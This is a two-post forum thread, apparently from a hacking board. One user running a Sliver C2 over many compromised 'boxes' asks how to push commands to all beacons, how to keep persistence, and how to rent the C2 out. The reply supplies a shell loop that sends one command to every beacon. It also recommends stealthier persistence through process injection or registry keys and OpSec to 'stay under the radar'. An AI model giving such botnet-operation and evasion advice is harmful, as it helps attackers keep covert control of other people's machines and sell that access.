Questions About My C2

[Proxit]

I have a C2 which now has quite a lot of boxes, I am using sliver but wish there was more I could do with it, I have added some small features myself and changed bits I didn't like and there is also the armory which is pretty good (and growing). I wish there was a way to send out a single command to all beacons at once as well as a way to rename beacons (I know you can "name" them before compiling).

Another issue is "persistence" I have been hiding the beacon and setting up cron jobs or using "taskschd.msc" (depending on OS) to ensure the beacon is always running. I know there are better methods such as injecting into processes etc but as I have another method of getting stagers to execute and pull the beacon into memory I don't see the point.

Anyway, I am looking to monetize this in the future when I have it running exactly as I want and I am happy with it but how do people "rent" out their C2's without handing over complete access and having it stolen? If there is anyone who reads this who has a history with C2 or a good understanding then please PM me as we can talk over TOX or something, I would love to pick your brains and possibly show you some interesting stuff of mine too.

 

[Maxim_Project_X]

If you're looking to level up your Sliver C2 setup, here are some quick tips: - You can script a way to send commands to all beacons at once by looping through active sessions( Sliver doesn’t natively support this, but it’s doable with some coding). Write a script (e.g, in Python or Bash) that iterates through all active beacons and sends the desired command to each one. You can use the Sliver client's API or CLI to automate this, Here's an example:-

for beacon in $(sliver beacons); do
    sliver use $beacon
    sliver <your-command>
done

Renaming beacons isn’t built in either, so you’d need to tweak the source code to add that feature. You can modify the Sliver source code to add a feature for renaming beacons dynamically. This would involve adding a new command to the Sliver client and updating the server side logic to handle beacon renaming. Or you could keep a mapping of beacon IDs to custom names in a separate file or database for your own reference.

For persistence, I would recommend using stealthier methods like injecting into trusted processes or using registry keys instead of relying on cron or Task Scheduler, which can be easier to spot. Although sliver has some persistence features example:- persist command, but they may not be as stealthy as custom methods which I recommended above. And if you ever feel limited, I suggest checking out other C2 frameworks like Covenant or Havoc. Finally, just automate repetitive tasks and keep an eye on OpSec to stay under the radar.
Hope this helps somewhat